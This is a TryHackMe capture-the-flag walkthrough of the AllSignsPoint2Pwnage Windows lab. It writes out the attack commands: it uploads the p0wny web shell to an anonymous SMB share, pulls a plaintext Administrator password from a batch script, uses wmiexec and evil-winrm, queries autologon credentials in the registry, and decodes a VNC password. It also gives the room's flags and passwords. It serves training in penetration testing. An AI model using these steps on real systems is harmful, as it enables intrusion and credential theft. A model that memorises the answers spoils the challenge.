AllSignsPoint2Pwnage TryHackMe Walkthrough

TL;DR Walkthrough of the TryHackMe room AllSignsPoint2Pwnage.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

The room has questions which I assume were meant to guide us, however I ran off the track the questions were on about halfway through Task 2 of 4. This was around the time I gained initial access, after which I was busy poking around the VM until I stumbled on Administrator access. I ended up using wmiexec as Administrator to enable WinRM, then I used evil-winrm to go back and find the answers to the questions.

I’ll show how I navigated through the VM from enumeration to initial access to privilege escalation and then do the room’s Q&A at the end.

On an admin note the astute reader will notice that the IPs change throughout this walkthrough. This is because TryHackMe has been very janky lately and I had to reset the VM a few times to complete the room. I didn’t use any reverse shells in this room, all IPs shown are the target VM on TryHackMe.

Enumeration

As always I started with a nmap scan.

sudo nmap -sS -sV -Pn 10.201.26.227

TryHackMe has been having a lot of issues lately. I had to reset the VM two or three times before I found all the ports. It kept timing out and only showing 135, 139, and 445.

It looks like the system has FTP and file shares open. I tried enumerating them with the guest account and no password, however this didn’t work beyond enum4linux. I next tried anonymous and found that worked for FTP and SMB access.

I found the share drives with enum4linux first.

enum4linux -u guest -a 10.201.123.124

I next tried FTP.

ftp 10.201.97.138

However there wasn’t anything there that we didn’t already know.

I swung by the website that’s running on port 80 thinking there might be a username list, but all I saw was some pictures.

I next tried anonymous access to the Images share.

smbclient //10.201.97.138/images$ -U anonymous

Interesting, this share drive looks like the same folder hosting the pictures on the website. Let’s try uploading something to it.

put p0wny.php

It uploaded the web shell, but I had no idea where it went URL wise. Hence I ran gobuster to check for the obvious directories on the web site.

gobuster dir -u http://10.201.97.138 -w /home/kali/Downloads/SecLists-master/Discovery/Web-Content/big.txt

There’s a directory named ‘images’. Go figure.

Initial Access

I navigated to

http://10.201.97.138/images/p0wny.php

Lo and behold we have web shell access as user ‘sign’.

I poked around the file system randomly for a few minutes, then thought to myself “wait a minute, there was another share called ‘Installs$’ that didn’t allow anonymous access. I wonder if I can access it with sign’s NTFS rights?”

Privilege Escalation

It turns out I could access it, and the key to privilege escalation was just laying there.

cd C:\
dir
cd C:\Installs
dir
type Install_www_and_deploy.bat

@echo off
REM Shop Sign Install Script
cd C:\Installs
psexec -accepteula -nobanner -u administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi xampp-windows-x64–7.4.11–0-VC15-installer.exe - disable-components xampp_mysql,xampp_filezilla,xampp_mercury,xampp_tomcat,xampp_perl,xampp_phpmyadmin,xampp_webalizer,xampp_sendmail - mode unattended - launchapps 1
xcopy C:\Installs\simepleslide\src\* C:\xampp\htdocs\
move C:\xampp\htdocs\index.php C:\xampp\htdocs\index.php_orig
copy C:\Installs\simepleslide\src\slide.html C:\xampp\htdocs\index.html
mkdir C:\xampp\htdocs\images
UltraVNC_1_2_40_X64_Setup.exe /silent
copy ultravnc.ini "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini" /y
copy startup.bat "c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\"
pause

Look at that, we have a potential Administrator password in plaintext. That was quick.

/usr/share/doc/python3-impacket/examples/wmiexec.py Administrator:RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi@10.201.97.138

winrm quickconfig -force

Q&A

At this point I used WinRM and PowerShell to go back and find the answers to the other questions in the room. The only answers I found while p0wning the VM were the ports open, share names, and the Administrator password.

evil-winrm -i 10.201.94.54 -u Administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

— — Task 1 — -

Deploy the machine

No answer needed

How many TCP ports under 1024 are open?

sudo nmap -sS -sV -Pn 10.201.26.227

6

What is the hidden share where images should be copied to?

enum4linux -u guest -a 10.201.123.124

Images$

— — Task 2 — -

What user is signed into the console session?

whoami

sign

What is the content of user_flag.txt?

Get-ChildItem -Path "C:\Users" -Filter *.txt -Recurse | Select-String -Pattern "THM" | Select-Object Path, LineNumber, Line

Path                                          LineNumber     Line
- - -                                           - - -        - - - 
C:\Users\Administrator\Desktop\admin_flag.txt 1              thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}
C:\Users\sign\Desktop\user_flag.txt           1              thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

What hidden, non-standard share is only remotely accessible as an administrative account?

Installs$

— — Task 3 — -

What is the Users Password?

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Select DefaultUserName, DefaultPassword, DefaultDomainName

DefaultUsername DefaultPassword                                         DefaultDomainName
- - - - - - - - - - - - - - - -                                         - - - - - - - - -
.\sign          gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

What is the Administrators Password?

We found this in a bat file while poking around the VM:

RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

What executable is used to run the installer with the Administrator username and password?

cat Install_www_and_deploy.bat

PsExec.exe

What is the VNC Password?

cd C:\Installs
cat ultravnc.ini

[ultravnc]
passwd=B3A8F2D8BEA2F1FA70
passwd2=5AB2CDC0BADCAF13F1

I had to decode the above using Luigi Auriemma’s vncpwd.

.\vncpwd.exe B3A8F2D8BEA2F1FA70

*VNC password decoder 0.2.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

- your input password seems in hex format (or longer than 8 chars)

Password: 5upp0rt9

Press RETURN to exit

5upp0rt9

On a sidenote, I didn’t get anything for the second VNC password ‘5AB2CDC0BADCAF13F1’. Apparently it’s the VNC encoded thing of null.

What is the contents of the admin_flag.txt?

Get-ChildItem -Path "C:\Users" -Filter *.txt -Recurse | Select-String -Pattern "THM" | Select-Object Path, LineNumber, Line

Path                                          LineNumber     Line
- - -                                           - - -        - - - 
C:\Users\Administrator\Desktop\admin_flag.txt 1              thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}
C:\Users\sign\Desktop\user_flag.txt           1              thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}

— — Task 4 — -

READ IT

No answer needed

Summary

This was a good little room. I brushed up on FTP, got some good practice with the p0wny web shell, learned a nifty trick about VNC config files, and even checked my notes on querying auto login passwords stored in the registry. I give the room’s author credit for leaving clues, info, and passwords on share drives and in bat files. Many real environments suffer from this, just ask Varonis. Humans are human after all, we write things down, get forgetful, don’t remove setup scripts after they’re used, etc. Lord knows I do it too.